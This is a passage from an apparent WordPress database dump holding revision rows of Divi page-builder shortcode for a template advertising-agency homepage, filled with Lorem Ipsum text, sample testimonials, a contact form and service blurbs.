admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:06:08','2020-07-04 21:06:08','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(177,1,'2020-07-04 21:46:09','2020-07-04 21:46:09','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" hover_enabled=\"0\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\" text_font_last_edited=\"on|phone\" content_last_edited=\"on|phone\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" text_font_size=\"18px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12px\" header_font_size_phone=\"55px\" header_font_size_tablet=\"64px\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" 